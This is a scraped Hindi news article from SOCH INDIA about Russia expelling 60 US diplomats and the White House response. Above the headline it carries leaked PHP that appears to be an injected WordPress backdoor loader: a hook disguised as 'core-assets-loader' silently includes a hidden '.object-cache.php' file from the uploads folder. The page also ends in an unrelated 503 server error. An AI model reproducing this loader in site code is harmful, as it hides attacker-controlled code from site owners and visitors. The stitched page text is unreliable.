add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); रूस ने लिया 60 अमेरिकी राजनयिकों को निकालने का फैसला, अमेरिकी ने कहा- द्विपक्षीय संबंध बिगाड़ रहा मॉस्को – SOCH INDIA
Menu

दुनिया
रूस ने लिया 60 अमेरिकी राजनयिकों को निकालने का फैसला, अमेरिकी ने कहा- द्विपक्षीय संबंध बिगाड़ रहा मॉस्को

nobanner

रूस के विदेश मंत्री सर्जेई लावरोव ने कहा कि मास्को अमेरिका के 60 राजनयिकों को देश से बाहर करेगा और सेंट पीर्ट्सबर्ग में इसके वाणिज्य दूतावास को भी बंद करेगा. एक पूर्व डबल एजेंट सजेई स्क्रिपल को जहर देने को लेकर ब्रिटेन, अमेरिका और अन्य यूरोपिय देशों ने रूस के राजनयिकों को निष्कासित किया था. रूस ने इसी के जवाब में यह कदम उठाने की घोषणा की है.

लावरोव ने कहा कि अमेरिकी राजदूत को जवाबी कार्रवाई के बारे में सूचित कर दिया गया है. उन्होंने कहा कि इसमें समान संख्या में राजनयिकों का निष्कासन और सेंट पीर्ट्सबर्ग में अमेरिकी महावाणिज्य दूतावास को बंद कदने का हमारा निर्णय शामिल है. आपको बता दें कि अमेरिका ने पहले रिकॉर्ड संख्या में 60 रूसी राजनयिकों को निष्कासित करने का आदेश दिया था और सिएटल में रूसी महावाणिज्य दूतावास को बंद कर दिया था.

रूस से द्विपक्षीय संबंध और बिगड़ रहे हैं: अमेरिका

अमेरिका के राष्ट्रपति भवन व्हाइट हाउस ने रूस के इस फैसले पर प्रतिक्रिया देते हुए आज कहा कि उसके 60 राजनयिकों को निष्कासित करने और सेंट पीटर्सबर्ग में अमेरिकी वाणिज्य दूतावास को बंद करने का आदेश द्विपक्षीय संबंधों को बिगाड़ने वाले हैं. व्हाइट हाउस की प्रेस सचिव सारा सैंडर्स ने कहा, ‘‘अमेरिकी राजनयिकों को निष्कासित करने की रूस की कार्रवाई इस बात का संकेत देती है कि अमेरिका-रूस संबंध और बदतर हो रहे हैं.’’

गौरतलब है कि रूस ने बदले की कार्रवाई करते हुए अमेरिका के 60 राजनयिकों को सात दिन के भीतर देश छोड़ने और 48 घंटों के भीतर सेंट पीटर्सबर्ग वाणिज्य दूतावास को बंद करने के लिए कहा है. सैंडर्स ने कहा, ‘‘अमेरिका और 24 से अधिक देशों के अलावा नाटो सहयोगियों द्वारा इस सप्ताह रूस के अघोषित खुफिया अधिकारियों को निकालना ब्रिटेन की सरजमीं पर रूस के हमला का उचित जवाब था.’’ सैंडर्स ने कहा कि रूस की प्रतिक्रिया ‘अप्रत्याशित नहीं’ है और अमेरिका इससे ‘निपट’ लेगा.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.